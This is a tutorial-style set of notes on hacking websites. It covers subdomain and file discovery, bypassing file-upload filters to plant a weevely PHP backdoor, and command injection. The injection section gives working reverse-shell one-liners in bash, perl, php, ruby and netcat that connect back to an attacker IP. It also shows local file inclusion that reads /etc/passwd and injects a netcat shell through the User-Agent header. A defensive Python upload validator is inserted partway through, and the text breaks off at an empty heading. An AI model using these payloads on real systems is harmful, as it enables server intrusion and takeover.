
Website Hacking

Gathering Information

We can gather information from a website using a whois lookup:

We can also discover subdomains:

knockpy --domain [target_domain] --recon      # passive information gathering
knockpy --domain [target_domain] --bruteforce # active information gathering

We can discover files using dirb:

dirb [target] [wordlist] [options]

File Upload Vulnerabilities

These are the simplest type of vulnerability: the application lets users upload executable files, such as PHP files, which the web server will then run.

We can generate a PHP shell using weevely:

weevely generate [password] [file_name] # generate the backdoor
weevely [url to file] [password]        # connect to the backdoor

If the website has some sort of protection against these kinds of files, we can fire up Burp Suite, rename our shell to shell.jpg so the Content-Type is set to image/jpeg, and then change the final filename back in Burp Suite before the request is sent. If that still doesn't work, we can upload a file named like shell.php.jpg and see whether it is accepted. Some example names are:

upload.php --- try to upload a simple PHP file
upload.php.jpeg --- to bypass the blacklist
upload.jpg.php --- to bypass the blacklist
upload.php --- and then change the Content-Type of the file to image or jpeg
upload.php* --- version 1 2 3 4 5 6 7 (i.e. upload.php1 ... upload.php7)
upload.PHP --- to bypass the blacklist
upload.PhP --- to bypass the blacklist
upload.pHp --- to bypass the blacklist
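As an added, defender-side example (not code from the original notes): a Python upload validator that rejects every filename trick in the list above by checking each dot-separated segment case-insensitively, verifying the file signature instead of trusting the client-supplied Content-Type, and storing the file under a server-generated name. The set of executable extensions is an assumption, not something the notes specify.

```python
import os
import re
import secrets

# Extensions a typical PHP handler would execute (assumed list: the php*
# numbered variants from the notes above plus phtml/phar, which Apache's
# PHP module commonly maps as well).
EXECUTABLE_EXTENSIONS = {"php", "php1", "php2", "php3", "php4", "php5",
                         "php6", "php7", "phtml", "phar"}

# Allow-list of accepted image types and the magic bytes each must start with.
ALLOWED_IMAGES = {
    "jpg":  (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png":  (b"\x89PNG\r\n\x1a\n",),
    "gif":  (b"GIF87a", b"GIF89a"),
}

# Only letters, digits, dot, underscore, dash: rejects upload.php*, NUL bytes, etc.
SAFE_NAME_RE = re.compile(r"^[A-Za-z0-9_.-]+$")


def validate_upload(filename, head):
    """Return (accepted, reason_or_stored_name).

    `head` is the first bytes of the uploaded body. The client's Content-Type
    header is deliberately not consulted: the attacker controls it (see the
    Burp Suite trick in the notes), so only the bytes themselves are trusted.
    """
    name = os.path.basename(filename)  # strip any directory traversal
    if not SAFE_NAME_RE.match(name) or "." not in name:
        return False, "unexpected characters or no extension"
    parts = name.lower().split(".")
    # Every segment is checked, so upload.php.jpeg, upload.jpg.php,
    # upload.PhP and upload.php5 are all rejected, not just the last part.
    if any(p in EXECUTABLE_EXTENSIONS for p in parts):
        return False, "executable extension present"
    ext = parts[-1]
    if ext not in ALLOWED_IMAGES:
        return False, "extension not in allow-list"
    if not any(head.startswith(magic) for magic in ALLOWED_IMAGES[ext]):
        return False, "file content does not match the %s signature" % ext
    # Never store under the client's name; issue a random server-side name.
    stored = secrets.token_hex(16) + "." + ext
    return True, stored
```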

Code Execution Vulnerabilities

These vulnerabilities allow an attacker to execute OS commands, whether Windows or Linux commands. They can be used to get a reverse shell, or to upload any file using the wget command.

We can append ; followed by a command (e.g. pwd) to the input to see whether it gets executed. If ; doesn't work, we can try | instead.

Some commands we can execute to get a reverse shell are:

bash -i >& /dev/tcp/[ip_address]/8080 0>&1

perl -e 'use Socket;$i="[ip_address]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

php -r '$sock=fsockopen("[ip_address]",8080);exec("/bin/sh -i <&3 >&3 2>&3");'

ruby -rsocket -e'f=TCPSocket.open("[ip_address]",8080).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

nc -e /bin/sh [ip_address] 8080

For netcat, we need a listener on our own machine:

nc -vv -l -p 8080

Local File Inclusion Vulnerabilities

This vulnerability allows an attacker to read ANY file on the same server, including files outside the www directory. We can read /etc/passwd, for example.

We can also gain a reverse shell by exploiting this vulnerability, by injecting code into a file that the server will include. One such file is ~/proc/self/environ~, which contains the HTTP_USER_AGENT variable sent with the request. With Burp Suite we can modify the User-Agent header in the headers section so that it carries PHP code, which is executed when the file is included. We can do something like:

passthru("nc -e /bin/sh [ip_address] [port]");

Remote File Inclusion Vulnerabilities